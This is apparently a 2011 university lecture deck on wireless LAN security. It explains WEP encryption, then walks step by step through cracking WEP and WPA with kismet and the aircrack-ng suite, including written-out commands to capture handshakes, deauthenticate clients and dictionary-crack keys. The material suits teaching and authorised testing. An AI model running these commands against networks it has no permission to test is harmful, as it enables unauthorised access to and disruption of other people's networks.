WLAN Security: Cracking WEP/WPA
Assoc. Prof. Anan Phonphoem, Ph.D. (รศ. ดร. อนันต์ ผลเพิ่ม)
http://www.cpe.ku.ac.th/~anan
Computer Engineering Department, Kasetsart University, Bangkok, Thailand
Wireless LANs 2011
WEP Block Diagram
[Figure: WEP frame processing. Encryption block (sender site): the Initialization Vector (IV) and the secret key (40-bit or 128-bit) feed the RC-4 pseudo-random number generator, which produces the key sequence; the integrity algorithm (CRC-32) computes the Integrity Check Value (ICV) over the plain text; plain text + ICV is bitwise XORed with the key sequence to give the cipher text, which is sent with the IV. Decryption block (receiver site): the IV and the secret key regenerate the key sequence, which is bitwise XORed with the cipher text to recover the plain text and the ICV; the integrity algorithm recomputes the ICV.]
WEP – Encoding
[Figure: encryption block. Inputs: plain text, secret key (40-bit or 128-bit), Initialization Vector (IV). Stages: integrity algorithm (CRC-32) producing the Integrity Check Value (ICV); RC-4 pseudo-random number generator producing the key sequence; bitwise XOR. Outputs: IV and cipher text.]
WEP Frame
Frame Header (clear text) | IV Header (4 bytes, clear text) | Frame Body (encrypted) | ICV Trailer (4 bytes, encrypted) | FCS (clear text)
WEP – Decryption
[Figure: decryption block. Inputs: IV, cipher text, secret key (40-bit or 128-bit). Stages: pseudo-random number generator producing the key sequence; bitwise XOR; integrity algorithm. Outputs: plain text and Integrity Check Value (ICV).]
Cracking WEP
Cracking Steps
1) Reconnaissance (Collect target info.) [kismet]
2) Run promiscuous mode [iwconfig, airmon]
3) Collect data [airodump]
4) Crack key [aircrack]
Default SSIDs
1) Reconnaissance (Collect target info.)
Kismet (Reconnaissance)
Kismet (AP Info.)
Kismet (Client Info.)
2) Run promiscuous mode
Regular Behavior
[Figure: stations 1 to 4; station 1 transmits to all (broadcast)]
Intention to Eavesdrop
[Figure: stations 1 to 4, one in promiscuous mode; station 1 transmits to station 4]
iwconfig
iwlist
Promiscuous Mode Setup
• By using iwconfig
Promiscuous Mode Setup
• By using airmon-ng
Promiscuous Mode Setup
3) Collect data
airodump
From Kismet
Airodump problem
root@APMoose:~/toulouse# airodump-ng mon0
ioctl(SIOCSIFFLAGS) failed: Operation not possible due to RF-kill
/dev/rfkill is the Linux kernel subsystem for controlling radio transmitters (activated/deactivated).
anan@APMoose:~$ rfkill list
0: phy0: Wireless LAN
    Soft blocked: no    (soft block: software can reactivate)
    Hard blocked: no    (hard block: software cannot reactivate)
1: acer-wireless: Wireless LAN
    Soft blocked: no
    Hard blocked: no
2: acer-bluetooth: Bluetooth
    Soft blocked: no
    Hard blocked: no
4: hci0: Bluetooth
    Soft blocked: no
    Hard blocked: no
Solve by:
root@APMoose:~/toulouse# rfkill unblock all
airodump
airodump data files
4) Crack Key
aircrack
• For non-encryption
aircrack
WEP Cracking Demo
Cracking WPA
Cracking Steps
1) Start the wireless interface in monitor mode on the specific AP channel
2) Start airodump-ng on AP channel with filter for bssid to collect authentication handshake
3) Use aireplay-ng to deauthenticate the wireless client
4) Run aircrack-ng to crack the pre-shared key using the authentication handshake
http://www.aircrack-ng.org/doku.php?id=cracking_wpa
1) Start Monitoring Mode
Check interface
iwconfig
Start monitoring mode
2) Start airodump-ng: collect authentication handshake
Start airodump-ng
Moose# airodump-ng -c 6 --bssid 00:1E:F7:xx:xx:xx -w psk mon0

| Parameter | Description |
| --- | --- |
| -c 6 | Wireless channel |
| --bssid 00:1E:F7:xx:xx:xx | AP's MAC |
| -w psk | File name prefix (contains IVs) |
| mon0 | Interface name |
Start airodump-ng with fewer parameters
Moose# airodump-ng -w psk mon0
3) Deauthenticate client
aireplay
Moose# aireplay-ng -0 1 -a 00:12:01:xx:xx:xx -c 00:23:11:xx:xx:xx mon0

| Parameter | Description |
| --- | --- |
| -0 | Deauthentication |
| 1 | Number of deauthentications sent |
| -a 00:12:01:xx:xx:xx | AP's MAC |
| -c 00:23:11:xx:xx:xx | MAC of the client being deauthenticated |
| mon0 | Interface name |
4) Crack
Need a dictionary
Moose# aircrack-ng -b 00:12:01:xx:xx:xx psk*.cap
With dictionary
Moose# aircrack-ng -w password.lst psk*.cap
Handshake found
http://www.aircrack-ng.org/doku.php?id=cracking_wpa
Successfully Cracked
http://www.aircrack-ng.org/doku.php?id=cracking_wpa